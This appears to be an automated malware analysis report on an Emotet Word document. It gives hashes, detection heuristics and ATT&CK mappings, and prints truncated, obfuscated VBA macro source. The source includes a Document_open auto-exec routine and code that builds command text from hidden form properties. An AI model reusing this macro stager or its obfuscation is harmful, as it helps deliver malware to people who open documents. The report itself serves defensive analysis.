Emotet Office (OLE) malware analysis — malicious · f521e75bef0a10af

MALICIOUS

Office (OLE)

200.7 KB Created: 2019-12-18 23:23:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 3c4982d872ef602dc8a7dcaa65a5cfad SHA-1: a1749f53cb6bd72b932192c2c17343f405c97189 SHA-256: f521e75bef0a10af3ab87adfa3b4d2aedca6a50417804d55df48436dba7001c4

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros, specifically a Document_Open macro designed to execute automatically. Critical heuristics indicate a hidden-property command stager and a ClamAV detection for 'Doc.Downloader.Emotet-7465038-1'. This suggests the macro's purpose is to download and execute a second-stage payload, consistent with Emotet's behavior.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7465038-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7465038-1
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10975 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10975 bytes
SHA-256: `dcfcc895cb193cfa88679924d00ad9cc54b6c92b9502f6012e548a1e9c81c927`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Dpjonrndf" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Zldjjoofvb, 0, 0, MSForms, TextBox" Private Sub Document_open() Tlcjlvmylqwab = Vqnqreweyqoqq Mytpaewpzi = 205 Xdfgjvzbaee = ("Doloribus ullam.") Wgetwfvmadyh = (883) Dim Vyanhknza As Boolean Dim Furjjiupvd As Integer Dim Wcdkewagyxoe As Boolean Dim Qwtgxfmjrkedq As Integer Dim Spdxgekez As Boolean Dim Alligmhk As Double Dim Vpgrfnltgbfec As String Kgvvfstxu = (719) Dim Xjerwgeh As String Xgbqzkti = ("Vel.") Jeavglolfbsl = (211) Dim Pcpofyauk As Boolean Aueghaowjqt = Lkrsbuiluv Vedyuotthfqke = Dobpwtgc Htqybfzck = "Amet impedit qui." Lyobzoafthoet = 203 Zwifyhcpkoqtp = Oqtsfqheexxuh Ynkrujyxcg = 889 Catvtcklvqzs = ("Voluptate autem maiores ut.") Sdiamvhypdjy = (207) Dim Qtqlkvfdkbe As Integer Dim Vqhnrhcrvpcuz As Boolean Dim Kqmuouvc As Integer Dim Holosgvuxlh As Integer Dim Rqkyudorlib As Integer Dim Okdczohzjtrc As Integer Dim Hzbcwcbvde As Boolean Ylwwgkvz = (662) Dim Rultaphxtv As String Gsjfeqstgyfy = ("Asperiores id dolorum natus libero veritatis molestiae amet quia.") Dnnggdrvihqcc = (81) Dim Gkbideemaff As Integer Esomeeltknood = Cpcngfaoep Zbmabwtrpse = Zuvwmtatujkdr Edkwsnmsxmns = "Dolorem." Ukldpglesswl = 893 Axtdxgltbjssx = Uhmwxlmjcma Fnvgtjcwsws = 751 Afqkcwnqxjk = ("Sed velit.") Loorqxrvn = (622) Dim Myoqtcltwjk As Boolean Dim Skdbzhdkhoxn As String Dim Fvjsmrcy As Double Dim Wwvyqcvbh As Integer Dim Gtqwfjdejqdma As Boolean Dim Mrxpqufvecmft As String Dim Wfmczbsvghyt As String Tkutsqddsfe = (811) Dim Lttekaquxaxgw As String Rhsblelsslbop = ("Rufus") Gyydgbncnte = (983) Dim Jwnvwhmkndps As String Atjlbbkt = Tnudeehhi Vyfshgctvi = Anjehcvkq Cinifivik = "Et culpa magni eveniet." Eudtuuhzdzhg = 12 Saztbwjqonfxd End Sub Attribute VB_Name = "Ixcwvnknjlj" Attribute VB_Base = "0{4685CC4F-4C40-4F5D-9BF7-3E6538FBFF93}{C390043E-8603-44C2-BDA1-89CBF6781149}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Zlljqntwt" Function Xxerdjkenbiax() Muqreidgf = Atcqbmeuqlw Cnnxtdolhhwp = 896 Enjjoucvvpbhp = ("Ipsam voluptatem voluptatem.") Kvpevoqugnc = (369) Dim Tlfbuoah As Boolean Dim Ivshrxvl As Boolean Dim Vwmhklinscv As Double Dim Zckkamayidtg As String Dim Hzwlcoig As Integer Dim Xqjfmoegwateh As Double Dim Ynrntsabjbnv As String Xmsflmkdvluy = (460) Dim Ijcsiqdaqt As Double Xoaezsnmy = ("Repellendus natus doloremque.") Zwbkurgt = (184) Dim Ptzyvmapw As String Ceowdqmbkblvi = Hgijkaibhvagd Wbrbwrnorbu = Ddxquzfugn Udgbdkivxekeh = "Maiores non." Tsrhpiyxd = 11 Wzwklzqxdngf = Dpjonrndf.Zldjjoofvb Eieyxlosciis = Ztgpmoqryhjw Vlflmjwqfpspt = 863 Xakibsourz = ("Cum dolorum voluptas mollitia modi molestiae.") Mkxpbcqw = (238) Dim Wgqwjorw As Double Dim Zhagynhfgqnm As Integer Dim Jfhzrndus As Integer Dim Esejacvco As Boolean Dim Krqnukpap As Boolean Dim Kndgrejr As Boolean Dim Fbtucwgnsko As Double Vpjesses = (159) Dim Birftlrswyre As Integer Srnjmxyohjiqi = ("Aperiam similique et.") Zawagrmlrmc = (75) Dim Remrzmlafvfi As Double Ahxdcqcxxve = Fgwwkvgwd Rwppteqsjem = Jzkptgqmphfu Umprxkglgbmds = "Totam sit autem iure." Aatccnklqc = 582 Mhjeqmjxjfotc = Wzwklzqxdngf + Ixcwvnknjlj.Dxsgnookgu + Ixcwvnknjlj.Eyklotir + Ixcwvnknjlj.Awwmxmfxppq Ihrwtzmbskyw = Motwcnppvebo Phpjgqpx = 447 Sfixwdmruxaih = ("Ab modi dignissimos.") Tdtlnuepmllv = (151) Dim Seoavdxfrss As Boolean Dim Umzgzhrmmw As Boolean Dim Dnpwmliwbbsmi As String Dim Uolasvjkc As String Dim Lnxdficar As Boolean Dim Jfgkujstm As Boolean Dim Dxybvteudnj As Integer Uzywkjhu = (326) Dim Ffuiaarjzfx As String Fdnjwxmu = ("Repudiandae sit dicta nemo iusto li ... (truncated)

SHA-256: dcfcc895cb193cfa88679924d00ad9cc54b6c92b9502f6012e548a1e9c81c927

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Dpjonrndf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Zldjjoofvb, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Tlcjlvmylqwab = Vqnqreweyqoqq
Mytpaewpzi = 205
Xdfgjvzbaee = ("Doloribus ullam.")
Wgetwfvmadyh = (883)
Dim Vyanhknza As Boolean
Dim Furjjiupvd As Integer
Dim Wcdkewagyxoe As Boolean
Dim Qwtgxfmjrkedq As Integer
Dim Spdxgekez As Boolean
Dim Alligmhk As Double
Dim Vpgrfnltgbfec As String
Kgvvfstxu = (719)
Dim Xjerwgeh As String
Xgbqzkti = ("Vel.")
Jeavglolfbsl = (211)
Dim Pcpofyauk As Boolean
Aueghaowjqt = Lkrsbuiluv
Vedyuotthfqke = Dobpwtgc
Htqybfzck = "Amet impedit qui."
Lyobzoafthoet = 203
   Zwifyhcpkoqtp = Oqtsfqheexxuh
Ynkrujyxcg = 889
Catvtcklvqzs = ("Voluptate autem maiores ut.")
Sdiamvhypdjy = (207)
Dim Qtqlkvfdkbe As Integer
Dim Vqhnrhcrvpcuz As Boolean
Dim Kqmuouvc As Integer
Dim Holosgvuxlh As Integer
Dim Rqkyudorlib As Integer
Dim Okdczohzjtrc As Integer
Dim Hzbcwcbvde As Boolean
Ylwwgkvz = (662)
Dim Rultaphxtv As String
Gsjfeqstgyfy = ("Asperiores id dolorum natus libero veritatis molestiae amet quia.")
Dnnggdrvihqcc = (81)
Dim Gkbideemaff As Integer
Esomeeltknood = Cpcngfaoep
Zbmabwtrpse = Zuvwmtatujkdr
Edkwsnmsxmns = "Dolorem."
Ukldpglesswl = 893
   Axtdxgltbjssx = Uhmwxlmjcma
Fnvgtjcwsws = 751
Afqkcwnqxjk = ("Sed velit.")
Loorqxrvn = (622)
Dim Myoqtcltwjk As Boolean
Dim Skdbzhdkhoxn As String
Dim Fvjsmrcy As Double
Dim Wwvyqcvbh As Integer
Dim Gtqwfjdejqdma As Boolean
Dim Mrxpqufvecmft As String
Dim Wfmczbsvghyt As String
Tkutsqddsfe = (811)
Dim Lttekaquxaxgw As String
Rhsblelsslbop = ("Rufus")
Gyydgbncnte = (983)
Dim Jwnvwhmkndps As String
Atjlbbkt = Tnudeehhi
Vyfshgctvi = Anjehcvkq
Cinifivik = "Et culpa magni eveniet."
Eudtuuhzdzhg = 12
Saztbwjqonfxd
End Sub

Attribute VB_Name = "Ixcwvnknjlj"
Attribute VB_Base = "0{4685CC4F-4C40-4F5D-9BF7-3E6538FBFF93}{C390043E-8603-44C2-BDA1-89CBF6781149}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Zlljqntwt"
Function Xxerdjkenbiax()
   Muqreidgf = Atcqbmeuqlw
Cnnxtdolhhwp = 896
Enjjoucvvpbhp = ("Ipsam voluptatem voluptatem.")
Kvpevoqugnc = (369)
Dim Tlfbuoah As Boolean
Dim Ivshrxvl As Boolean
Dim Vwmhklinscv As Double
Dim Zckkamayidtg As String
Dim Hzwlcoig As Integer
Dim Xqjfmoegwateh As Double
Dim Ynrntsabjbnv As String
Xmsflmkdvluy = (460)
Dim Ijcsiqdaqt As Double
Xoaezsnmy = ("Repellendus natus doloremque.")
Zwbkurgt = (184)
Dim Ptzyvmapw As String
Ceowdqmbkblvi = Hgijkaibhvagd
Wbrbwrnorbu = Ddxquzfugn
Udgbdkivxekeh = "Maiores non."
Tsrhpiyxd = 11
Wzwklzqxdngf = Dpjonrndf.Zldjjoofvb
   Eieyxlosciis = Ztgpmoqryhjw
Vlflmjwqfpspt = 863
Xakibsourz = ("Cum dolorum voluptas mollitia modi molestiae.")
Mkxpbcqw = (238)
Dim Wgqwjorw As Double
Dim Zhagynhfgqnm As Integer
Dim Jfhzrndus As Integer
Dim Esejacvco As Boolean
Dim Krqnukpap As Boolean
Dim Kndgrejr As Boolean
Dim Fbtucwgnsko As Double
Vpjesses = (159)
Dim Birftlrswyre As Integer
Srnjmxyohjiqi = ("Aperiam similique et.")
Zawagrmlrmc = (75)
Dim Remrzmlafvfi As Double
Ahxdcqcxxve = Fgwwkvgwd
Rwppteqsjem = Jzkptgqmphfu
Umprxkglgbmds = "Totam sit autem iure."
Aatccnklqc = 582
Mhjeqmjxjfotc = Wzwklzqxdngf + Ixcwvnknjlj.Dxsgnookgu + Ixcwvnknjlj.Eyklotir + Ixcwvnknjlj.Awwmxmfxppq
   Ihrwtzmbskyw = Motwcnppvebo
Phpjgqpx = 447
Sfixwdmruxaih = ("Ab modi dignissimos.")
Tdtlnuepmllv = (151)
Dim Seoavdxfrss As Boolean
Dim Umzgzhrmmw As Boolean
Dim Dnpwmliwbbsmi As String
Dim Uolasvjkc As String
Dim Lnxdficar As Boolean
Dim Jfgkujstm As Boolean
Dim Dxybvteudnj As Integer
Uzywkjhu = (326)
Dim Ffuiaarjzfx As String
Fdnjwxmu = ("Repudiandae sit dicta nemo iusto li
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.